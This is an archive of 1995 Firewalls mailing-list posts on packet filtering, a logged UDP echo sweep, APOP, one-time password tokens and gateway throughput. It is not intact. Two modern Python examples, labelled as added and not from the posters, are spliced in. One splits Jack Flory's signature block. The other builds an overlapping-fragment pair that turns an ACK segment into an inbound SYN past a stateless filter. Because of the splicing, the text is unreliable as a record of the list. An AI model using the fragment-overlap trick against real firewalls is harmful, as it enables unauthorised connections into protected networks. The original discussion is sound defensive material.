Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA29315 for ; Tue, 9 May 1995 12:48:26 -0700
Received: from blackhole.milkyway.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950507) id MAA28750; Tue, 9 May 1995 12:47:24 -0700
Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id PAA00154 for ; Tue, 9 May 1995 15:55:54 -0400
Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma000148; Tue May 9 15:55:44 1995
Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id PAA18434; Tue, 9 May 1995 15:50:17 -0400
From: Michael Richardson
Received: by metis.milkyway.com (8.6.9/BSDI-Client) id PAA00949; Tue, 9 May 1995 15:58:06 -0400
Date: Tue, 9 May 1995 15:58:06 -0400
Message-Id: <199505091958.PAA00949@metis.milkyway.com>
To: alan@mid.NET
Subject: Re: SNMP list consolidated
Newsgroups: milkyway.mail.firewalls
In-Reply-To: <199505091615.LAA23178@noc1.mid.net>
Organization: Milkyway Networks Corporation
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In article <199505091615.LAA23178@noc1.mid.net> you write:
> Michael, perhaps you'd care to subscribe the people in your list onto the
>mailing list at midnet by scripting a mass subscribe.

Done. I had near 70 subscriptions. I think it might be too big ;-)

--
:!mcr!:             | Milkyway Networks Corporation
Michael Richardson  | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.

From firewalls-owner Wed May 10 14:56:39 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28075 for firewalls-outgoing; Wed, 10 May 1995 13:17:17 -0700
Received: from BBN.COM (BBN.COM [128.89.0.122]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA28068 for ; Wed, 10 May 1995 13:17:14 -0700
Received: from archetype.prospect.com by BBN.COM id aa09764; 10 May 95 16:11 EDT
Received: from sol.atype.com by atype.com (NX5.67d/NX3.0M) id AA18014; Wed, 10 May 95 16:11:05 -0400
Received: from titan by sol.atype.com (NX5.67d/NeXT-2.0) id AA25977; Wed, 10 May 95 16:11:03 -0400
From: deh@atype.com (David E. Hollingsworth)
Message-Id: <9505102011.AA25977@sol.atype.com>
Received: by titan.atype.com (NX5.67d/NX3.0X) id AA03471; Wed, 10 May 95 16:11:03 -0400
Date: Wed, 10 May 95 16:11:03 -0400
Received: by NeXT.Mailer (1.100)
Received: by NeXT Mailer (1.100)
To: mjsus@atlanta.com (Markku Saarelainen)
Subject: Re: Real Case: 0.01 % probability
Cc: firewalls@greatcircle.com
Reply-To: deh@atype.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>As this example shows the structured and organized Information
>Security System can prevent potential damages in an overall
>information system, and without the Information Security System the
>probability of these damages happening is much higher.

Hurm. It seems to me that what the example shows is that high-falutin'
phrases like "Information Security System Manual" don't protect one from
lapses of common sense. It's all well and good for the "Business Analyst
and Developer" to follow the "Information Security Program", but it's
simply not a good idea to keep a machine plugged into a socket controlled
by a light switch.

I imagine that the new, reengineered, manual won't mention anything about
not storing equipment in unused, but operative, sinks. But if I found such
a situation (or the light switch situation) at my installation, I'd be
livid. Someone's going to turn that faucet handle eventually, and all of
the references to manuals, programs, and pure human error won't erase the
fact that it was just plain dumb for that equipment to be there in the
first place.

Security procedures are useful, but they're tools, not crutches.

--deh!
David Hollingsworth
deh@atype.com

From firewalls-owner Wed May 10 15:12:02 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27903 for firewalls-outgoing; Wed, 10 May 1995 13:11:19 -0700
Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27892; Wed, 10 May 1995 13:11:12 -0700
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 10 May 1995 13:12:01 -0800
To: Robert Bonomi , fc@all.net
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: impossible vs. impractical
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What the hell does this have to do with Firewalls? I STRONGLY object to
people exporting flame wars from BugTraq to Firewalls. KNOCK IT OFF!

-Brent

At 1:02 AM 5/10/95, Robert Bonomi wrote:
> From owner-bugtraq@fc.net Tue May 9 17:55:24 1995
> Received: from sprawl.fc.net by delta.eecs.nwu.edu (8.6.12/8.6.12)
>with ESMTP id RAA25223 for ; Tue, 9 May 1995
>17:55:21 -0500
> Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by
>sprawl.fc.net (8.6.10/8.6.10) with ESMTP id FAA15664 for
>; Mon, 8 May 1995 05:46:25 -0500
> Received: (from majordom@localhost) by freeside.fc.net
>(8.6.8.1/8.6.6) id FAA24207 for bugtraq-outgoing; Mon, 8 May 1995 05:48:27
>-0500
> Received: from all.net (all.net [204.7.229.1]) by freeside.fc.net
>(8.6.10/8.6.6) with SMTP id FAA24195 for ; Mon, 8 May 1995
>05:48:20 -0500
> From: fc@all.net (Dr. Frederick B. Cohen)
> Received: by all.net (4.1/3.2.012693-Management Analytics);
> id AA07209 for bugtraq@fc.net; Mon, 8 May 95 06:42:48 EDT
> Message-Id: <9505081042.AA07209@all.net>
> Subject: Re: impossible vs. impractical
> To: mcn@EnGarde.com (Mike Neuman)
> Date: Mon, 8 May 1995 06:42:47 -0400 (EDT)
> Cc: bugtraq@fc.net
> In-Reply-To: <199505080429.XAA13309@guardian.EnGarde.com> from
>"Mike Neuman" at May 7, 95 11:29:15 pm
> X-Mailer: ELM [version 2.4 PL22]
> Content-Type: text
> Content-Length: 946
> Sender: owner-bugtraq@fc.net
> Precedence: bulk
> Status: R
>
> > Oh good. I think possibility has practicality implied. After
>all, if you
> > can generate an infinite amount of energy, you CAN go the speed
>of light
> > (according to the current laws of physics), so there, it's not
>impossible.
>
> But according to current physics, there is a finite amount of total
> energy in the Universe, and thus it is impossible to get the infinite
> energy required to do this - again, impossible, not infeasible.
>
>WRONG! the 'total energy in the universe is finite' is an UNPROVEN assumption.
>
>I'll grant 'consistent with the currently-held *theories*', but that's all.
>Those 'theories' are just that, however THEORIES, and by their very nature
>*un-provable* in a formal sense. They are accepted *only* because no one
>has _yet_ come up with a 'dis-proof by counter-example'.
----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule
of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                          Great Circle Associates
Brent@GreatCircle.COM                  1057 West Dana Street
+1 415 962 0841                        Mountain View, CA 94041

From firewalls-owner Wed May 10 16:46:14 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA04227 for firewalls-outgoing; Wed, 10 May 1995 16:19:49 -0700
Received: from eden.telalink.net (eden.telalink.net [199.1.88.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA04222 for ; Wed, 10 May 1995 16:19:46 -0700
Received: from netblazer1-s16.telalink.net (netblazer1-s16.telalink.net [199.1.88.144]) by eden.telalink.net (8.6.10/A/UX 3.1.1) with SMTP id SAA13950 for ; Wed, 10 May 1995 18:24:19 -0500
Date: Wed, 10 May 1995 18:24:19 -0500
Message-Id: <199505102324.SAA13950@eden.telalink.net>
From: "Jason M. LeBlanc"
To: firewalls@greatcircle.com
Subject: Good all encompassing security guide
X-Mailer: ProntoIP [version 1.03]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I know that's a misnomer...
I need security info concerning the internet and NT servers, very new to
the internet from a server standpoint, so don't beat me too hard.
Something like 1. plug the thing in... 2. turn it on... 3. click on make me
secure..., anything like that out there? Course not. But still looking...
Appreciate any help.

Thanks
Jason M. LeBlanc
foxhunter@telalink.net
MIS
Last Straw Communications

From firewalls-owner Wed May 10 21:39:19 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06972 for firewalls-outgoing; Wed, 10 May 1995 21:21:47 -0700
Received: from mig.com (Mig-ACIFR.co.westnet.net [198.59.90.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA06966 for ; Wed, 10 May 1995 21:21:44 -0700
From: jpf@mig.com (Jack Flory)
Message-Id: <199505110422.WAA16152@mig.com>
Subject: A Probe?
To: firewalls@greatcircle.com
Date: Wed, 10 May 1995 22:22:19 -0600 (MDT)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 2034
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Forgive me for my lapses... I have not subscribed to the list for some
time. However, I ran across the following sequence in my log files and I
thought some of you might have a few ideas about the pattern. Does this
appear to be an organized probe? This is one of the few irregularities
that I have not been able to trace to routing flaps due to Internet
restructuring. Please reply directly to keep the S/N ratio low. ThankX.
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.71](2769->7)
May 10 20:54:11 gateway kernel: REJECT (IN): UDP [204.240.1.23]->[204.132.146.17](2715->7) ulen 13 on eth0
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.52](2750->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.39](2737->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.90](2788->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.109](2807->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.129](2827->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.149](2847->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.169](2867->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.190](2888->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.210](2908->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.229](2927->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.250](2948->7)

The source appears to be a CIDR block on PSI.

--
=============================================================
Jack Flory                        Migration Associates Corp.
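Added example (not from Jack Flory's post, nor anyone's code on the list): the thirteen REJECT lines above carry a pattern that is easier to confirm by script than by eye. One source, one destination port (7/udp, echo), every target inside 204.132.146.0/24, all in the same second, and a source port that is always exactly 2698 above the target's last octet, which is what one process opening a fresh socket per host in address order looks like. The Python below parses screend and kernel REJECT lines in the format shown, groups them by source, protocol, destination port and second, and reports any group that touched many distinct hosts, with the constant-offset test as a second signal. The sample input is the post's lines plus one constructed, unrelated TCP reject; the threshold and field names are this example's own.

```python
import re
from collections import defaultdict
from ipaddress import ip_network

# Constructed input: the screend/kernel REJECT lines quoted in the post, plus
# one unrelated TCP reject (198.51.100.9 is a documentation address) so the
# grouping has something to leave alone.
SAMPLE_LOG = """\
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.71](2769->7)
May 10 20:54:11 gateway kernel: REJECT (IN): UDP [204.240.1.23]->[204.132.146.17](2715->7) ulen 13 on eth0
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.52](2750->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.39](2737->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.90](2788->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.109](2807->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.129](2827->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.149](2847->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.169](2867->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.190](2888->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.210](2908->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.229](2927->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.250](2948->7)
May 10 20:55:03 gateway screend[4377]: REJECT: TCP [198.51.100.9]->[204.132.146.5](1034->25)
"""

# Matches both "screend[pid]: REJECT:" and "kernel: REJECT (IN):" lines in the
# format shown; anything after the port pair ("ulen 13 on eth0") is ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (?:screend\[\d+\]|kernel): "
    r"REJECT(?: \(IN\))?: (?P<proto>TCP|UDP) "
    r"\[(?P<src>[\d.]+)\]->\[(?P<dst>[\d.]+)\]\((?P<sport>\d+)->(?P<dport>\d+)\)"
)


def parse_rejects(text):
    """One dict per REJECT line; lines in another format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["sport"], e["dport"] = int(e["sport"]), int(e["dport"])
        events.append(e)
    return events


def find_sweeps(events, min_targets=8):
    """Report (source, proto, dest port, second) groups that hit at least
    min_targets distinct destinations. 'sequential' is True when source port
    minus the target's last octet is identical for every hit, the footprint
    of one process opening a socket per host in address order."""
    buckets = defaultdict(list)
    for e in events:
        buckets[(e["src"], e["proto"], e["dport"], e["ts"])].append(e)
    sweeps = []
    for (src, proto, dport, ts), hits in sorted(buckets.items(), key=lambda kv: kv[0]):
        targets = {h["dst"] for h in hits}
        if len(targets) < min_targets:
            continue
        offsets = {h["sport"] - int(h["dst"].rsplit(".", 1)[1]) for h in hits}
        nets = {str(ip_network(t + "/24", strict=False)) for t in targets}
        sweeps.append({
            "src": src, "proto": proto, "dport": dport, "when": ts,
            "targets": len(targets), "networks": sorted(nets),
            "sequential": len(offsets) == 1,
            "port_offset": offsets.pop() if len(offsets) == 1 else None,
        })
    return sweeps


if __name__ == "__main__":
    for s in find_sweeps(parse_rejects(SAMPLE_LOG)):
        print(f"{s['when']}: {s['src']} -> {s['targets']} hosts in "
              f"{','.join(s['networks'])} on {s['proto']}/{s['dport']}"
              f"{' (sequential sockets)' if s['sequential'] else ''}")
```

Run against the post's lines this reports one sweep: 204.240.1.23 reaching 13 hosts in 204.132.146.0/24 on UDP/7 within the one logged second, with the sequential-socket signal set. The lone TCP reject stays below the threshold and is not reported, which is the point of grouping before alerting.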
Phone: +1.719.488.0247            19935 Hamal Drive
FAX:   +1.719.481.8718            Monument, CO 80132-9717
email: jpf@mig.com
=============================================================

From firewalls-owner Wed May 10 23:09:46 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08261 for firewalls-outgoing; Wed, 10 May 1995 22:50:09 -0700
Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA08256 for ; Wed, 10 May 1995 22:50:06 -0700
Received: from elf.wang.com by tuna.wang.com with SMTP id AA00767 (5.67b/IDA-1.5 for ); Thu, 11 May 1995 01:50:44 -0400
Received: from fnord.wang.com by elf.wang.com with SMTP id AA26775 (5.67a/IDA-1.5 for ); Thu, 11 May 1995 01:49:09 -0400
Received: by fnord.wang.com (5.67a/TF8) id AA19261; Thu, 11 May 1995 01:50:36 -0400
Date: Thu, 11 May 1995 01:50:36 -0400
From: Tom Fitzgerald
Message-Id: <199505110550.AA19261@fnord.wang.com>
To: firewalls@greatcircle.com
Subject: Re: IP packet filtering...
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

avalon@coombs.anu.edu.au (Darren Reed) writes:

>>> Somewhat luckily for filtering, in TCP and UDP packets the port numbers
>>> are almost assured of being in the first fragment. The "established"
>>> bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an
>>> MTU of 28, successfully - I've done it.

No argument, but RFC 791 says "Every internet module must be able to
forward a datagram of 68 octets without further fragmentation", so it
should always be safe to toss fragments smaller than that.

> To this, I might add, it is rather fortunate that all reassembly
> routines I've examined so far use the "hole-filling" paradigm (RFC815).
> Had the one in the original RFC (791) been in common use, it would have
> been a lot less cosy doing packet filtering :-/

Hmmmm.... while you're right that RFC 791's reassembly algorithm is
broken, I'm not sure that RFC 815 fixes it. Filtering breaks if data from
one fragment is allowed to overwrite overlapping data from another fragment
with a lower fragment-offset, and RFC 815 doesn't seem to prohibit this.

The BSD/OS reassembly algorithm, for one, definitely does the right thing.
It goes to some trouble to make sure that when fragments overlap, the
fragment with the lower offset overwrites fragments with higher offset.

If the reassembly algorithm was broken (like RFC 791's), it could be
exploited by cooking up two overlapping fragments: one having a complete
TCP header harmless enough to get through the firewall (for example ACK=1
to get through an "established" filter), and the second fragment beginning
in the middle of the TCP header, overwriting the flags to set ACK=0, to
open a new connection inbound through the firewall. The second fragment
would have offset>0, so the TCP filtering wouldn't be applied to it. This
trick can't fake the source and destination port numbers, they're too close
to the beginning of the TCP header, but it can fake anything else.
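Added example, not from Tom Fitzgerald's message or any list member's code: a small Python reassembly harness that models the two policies discussed above (a later fragment overwriting octets already present, versus the lower-offset fragment always winning, as described for BSD/OS) and the per-fragment checks a stateless filter can make (drop non-final fragments below the 68-octet RFC 791 minimum; test the ACK bit only on the offset-0 fragment, since later fragments carry no TCP header of their own). The fragment pair is constructed to match the scenario in the message: an ACK-only TCP header in the first fragment and a second fragment starting 8 octets in. The function names, the 20-octet IP header assumption and the choice to exempt the final fragment from the length rule are this example's own, not something the message states.

```python
import struct
from dataclasses import dataclass

TCP_SYN = 0x02
TCP_ACK = 0x10
IP_HDR_LEN = 20     # assumption for this example: no IP options
MIN_DATAGRAM = 68   # RFC 791: every module forwards 68 octets unfragmented


@dataclass
class Fragment:
    offset: int     # octets from the start of the transport payload (multiple of 8)
    more: bool      # the IP "more fragments" bit
    data: bytes     # transport-layer octets carried by this fragment


def tcp_header(sport, dport, flags):
    """A 20-octet TCP header with the given flag bits (seq/ack/checksum zeroed)."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)


def reassemble(frags, policy):
    """Rebuild the transport payload from fragments.
    policy="last":   a fragment overwrites octets already filled, so arrival
                     order decides (the behaviour the thread calls broken).
    policy="lowest": the fragment with the lower offset wins every overlapping
                     octet (the BSD/OS behaviour described in the message)."""
    if policy not in ("last", "lowest"):
        raise ValueError("unknown policy")
    for f in frags:
        if f.offset % 8:
            raise ValueError("fragment offset must be a multiple of 8 octets")
    total = max(f.offset + len(f.data) for f in frags)
    buf, filled = bytearray(total), bytearray(total)
    order = sorted(frags, key=lambda f: f.offset) if policy == "lowest" else list(frags)
    for f in order:
        for i, b in enumerate(f.data):
            pos = f.offset + i
            if policy == "last" or not filled[pos]:
                buf[pos], filled[pos] = b, 1
    if not all(filled):
        raise ValueError("datagram still has holes")
    return bytes(buf)


def passes_stateless_filter(frag):
    """Per-fragment verdict of an 'established only' filter: non-final fragments
    shorter than the RFC 791 minimum are dropped; the ACK test applies to the
    first fragment only, because later fragments carry no TCP header."""
    if frag.more and IP_HDR_LEN + len(frag.data) < MIN_DATAGRAM:
        return False
    if frag.offset == 0:
        if len(frag.data) < 20:
            return False
        return bool(frag.data[13] & TCP_ACK)
    return True


def tcp_flags(payload):
    """Flags octet of the reassembled TCP header (octet 13)."""
    return payload[13]


# Constructed input: the first fragment is an innocuous ACK segment; the second,
# starting 8 octets in, re-supplies octets 8..63 with the flags octet set to SYN.
FIRST = Fragment(0, True, tcp_header(1025, 25, TCP_ACK) + bytes(44))
SECOND = Fragment(8, False, tcp_header(1025, 25, TCP_SYN)[8:] + bytes(44))
FRAGS = [FIRST, SECOND]


def demo():
    """Filter verdicts per fragment and the flags each reassembly policy yields."""
    return {
        "first_passes": passes_stateless_filter(FIRST),
        "second_passes": passes_stateless_filter(SECOND),
        "flags_last": tcp_flags(reassemble(FRAGS, "last")),
        "flags_lowest": tcp_flags(reassemble(FRAGS, "lowest")),
    }


if __name__ == "__main__":
    print(demo())
```

Both fragments pass the per-fragment filter. Under the overwrite policy the reassembled segment carries SYN with ACK clear, which is the inbound connection the message warns about; under lower-offset-wins the ACK header survives and the second fragment's octets are discarded. The port numbers come out identical either way, matching the last sentence of the message. A filter that cannot reassemble itself should therefore either drop any non-first fragment that overlaps the first 20 transport octets or hand fragments to a reassembling proxy.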
--
Tom Fitzgerald   1-508-967-5278   Wang Labs, Lowell MA, USA   fitz@wang.com

From firewalls-owner Thu May 11 01:16:28 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA10493 for firewalls-outgoing; Thu, 11 May 1995 00:59:54 -0700
Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA10488 for ; Thu, 11 May 1995 00:59:50 -0700
Received: from post.demon.co.uk by disperse.demon.co.uk id aa01112; 11 May 95 8:27 GMT-60:00
Received: from roverpte.demon.co.uk by post.demon.co.uk id aa06991; 11 May 95 8:27 GMT-60:00
Received: from boiled.rover.com by roverpte.demon.co.uk (5.65c) id AA13683; Wed, 10 May 1995 16:54:54 +0100
Received: by boiled.rover.com (5.65c) id AA04199; Wed, 10 May 1995 16:48:36 +0100
Message-Id: <199505101548.AA04199@boiled.rover.com>
To: firewalls@greatcircle.com
Subject: apop
Date: Wed, 10 May 95 16:48:35 +0100
From: Lyndon David
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Dear all,

I am looking at logging in via pop3 from across the net. Obviously I don't
want to use the standard pop3 as this sends the password in plain text, what
I do want is to use one time passwords, preferably S/Key. I have heard about
apop which does one time passwords for pop3 and can be used with Eudora. A
search of archie only revealed add ons for the mac eudora and no sign of a
server. Can anyone tell me if this is available for the PC version and where
I can get the server from ?

I am not worried about people looking at the mail as it moves across the net
as I figured that it was sent in plain text anyway. I just don't want someone
picking up the password.
Thanks
Lyndon David

From firewalls-owner Thu May 11 01:41:10 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA10000 for firewalls-outgoing; Thu, 11 May 1995 00:40:45 -0700
Received: from relay.xlink.net (relay.xlink.net [193.141.40.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA09994 for ; Thu, 11 May 1995 00:40:42 -0700
Received: from nixe.ISAR.net by relay.xlink.net id <27947-0@relay.xlink.net>; Thu, 11 May 1995 09:40:53 +0000
Received: from GeNUA.DE (Ugenua@localhost) by nixe.isar.net (8.6.12/ni-1.2) with UUCP id JAA01686; Thu, 11 May 1995 09:40:46 +0200
Received: from localhost.GeNUA.DE by Woozle.GeNUA.DE with SMTP id AA23158 (5.65c/IDA-1.4.4); Thu, 11 May 1995 09:20:20 +0200
Message-Id: <199505110720.AA23158@Woozle.GeNUA.DE>
To: nto2584@tserver.dsac.dla.mil (Steven Payne)
Cc: toreh@sds.no (toreh), firewalls@greatcircle.com
Subject: Re: If you've got nothing to do, don't do it here (was Re: Pentagon security professionals)
In-Reply-To: Your message of "Tue, 09 May 95 09:41:01 EDT." <9505091341.AA07421@tserver.dsac.dla.mil>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 May 1995 09:20:18 +0200
From: Bernhard Schneck
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In message <9505091341.AA07421@tserver.dsac.dla.mil> you write:
> NOTE 1: We are using a 486 running BSDI with 12 Mg of ram, unfortunately the
> 486 has no level 2 cache right now, it is on order (256K), and I know
> this will tremendously improve the OS' throughput. Also the cpu is
> only a DX33.
I got FTP transfer rates between 200 and 250kByte/sec between the
following systems:

source: DECstation 5000/200 (R3000), 32MB, on-board ethernet (ln0)
sink:   DECstation 5000/240 (R3000), 64MB (?), on-board ethernet (ln0)
gate:   486DX33, 16MB, 128kb cache, 200MB IDE, 2 SMC Elite Ultra
        BSD/OS 2.0, FWTK 1.3

Note this was observed doing standard file transfers during an
installation, not any real performance measurements and without tuning.
Also, this was using a single FTP connection through ftp-gw with maybe
some other traffic going on, but probably not too much (I didn't check
this).

This should be enough up to about E1 speeds (2Mbit/sec). For this
installation, it certainly was, as there is only a 64kBit/sec WAN line
to the network provider.

\Bernhard.

From firewalls-owner Thu May 11 03:09:27 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13473 for firewalls-outgoing; Thu, 11 May 1995 03:03:31 -0700
Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA13468 for ; Thu, 11 May 1995 03:03:26 -0700
Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA13153; Thu, 11 May 1995 12:02:44 +0200
Received: from by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AB26713; Thu, 11 May 95 12:05:24 +0200
Message-Id: <9505111005.AB26713@istans.ansf.alcatel.fr>
From: "Kare Presttun"
Organization: Alcanet International
To: Firewalls@GreatCircle.COM
Date: Thu, 11 May 1995 12:04:17 CET
Subject: One time password token
Priority: normal
X-Mailer: Pegasus Mail/Windows (v1.22)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Sun, 7 May 95 08:18:03 -0400
Subject: One Time Password Tokens

>Basically there are two types of tokens today, time synchronous and
>challenge response.
Both work well (one went white water rafting

There are two classes of tokens, asynchronous (challenge/response) and
synchronous. There are two possible synchronization schemes, time and
history. SecurID uses the first, and the new tokens from Enigma Logic use
the latter. One benefit of history synchronism is that there is no need to
synchronize the clocks, and another is that the password is valid just
once, not within a time window.

>The time synchronous are the easiest to use, just read off a number and
>type it in plus a PIN, the biggest problem being drift and a "window of

The history synchronous are just as easy to use.

Kare
================================================================
* Kare Presttun              Tel: +33 1 4058 5614              *
* Alcanet International      Fax: +33 1 4058 5945              *
* 33, rue Emeriau            Kare.Presttun@ansf.alcatel.fr     *
* F-75015 Paris                                                *
* France                                                       *
================================================================

From firewalls-owner Thu May 11 03:27:16 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13479 for firewalls-outgoing; Thu, 11 May 1995 03:03:36 -0700
Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA13474 for ; Thu, 11 May 1995 03:03:31 -0700
Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA13148; Thu, 11 May 1995 12:02:43 +0200
Received: from ahqp14.ansf.alcatel.fr ([155.132.120.211]) by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AA26713; Thu, 11 May 95 12:05:23 +0200
Message-Id: <9505111005.AA26713@istans.ansf.alcatel.fr>
From: "Kare Presttun"
Organization: Alcanet International
To: Firewalls@GreatCircle.COM
Date: Thu, 11 May 1995 11:51:43 CET
Subject: One time password token
Priority: normal
X-Mailer: Pegasus Mail/Windows (v1.22)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

------------------------------

From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Sun, 7 May 95 08:18:03 -0400
Subject: One Time Password Tokens

Basically there are two types of tokens today, time synchronous and
challenge response. Both work well (one went white water rafting

The correct statement is that there are two classes of tokens,
asynchronous and synchronous. The first one is what is called challenge
response. The second category contains two technologies, time synchronous
and history synchronous. The SecurID is time synchronous, and the new
tokens from Enigma Logic can operate in both asynchronous and history
synchronous mode (nice technology Bob). The history synchronous technology
does not have the drawback that the password is valid within a time window.

in Alaska with a SecurID in my wallet - it survived and have been using
the same SafeWord for over four years now) and each has limitations/
strengths.

The time synchronous are the easiest to use, just read off a number and

The history synchronous works exactly the same way for the user.

Kare
================================================================
* Kare Presttun              Tel: +33 1 4058 5614              *
* Alcanet International      Fax: +33 1 4058 5945              *
* 33, rue Emeriau            Kare.Presttun@ansf.alcatel.fr     *
* F-75015 Paris                                                *
* France                                                       *
================================================================

From firewalls-owner Thu May 11 03:40:33 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA13413 for firewalls-outgoing; Thu, 11 May 1995 02:59:51 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA13408 for ; Thu, 11 May 1995 02:59:44 -0700
Message-Id: <199505110959.CAA13408@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA172596447; Thu, 11 May 1995 20:00:47 +1000
From: Darren Reed
Subject: Re: IP packet filtering...
To: fitz@wang.com (Tom Fitzgerald)
Date: Thu, 11 May 1995 20:00:47 +1000 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199505110550.AA19261@fnord.wang.com> from "Tom Fitzgerald" at May 11, 95 01:50:36 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
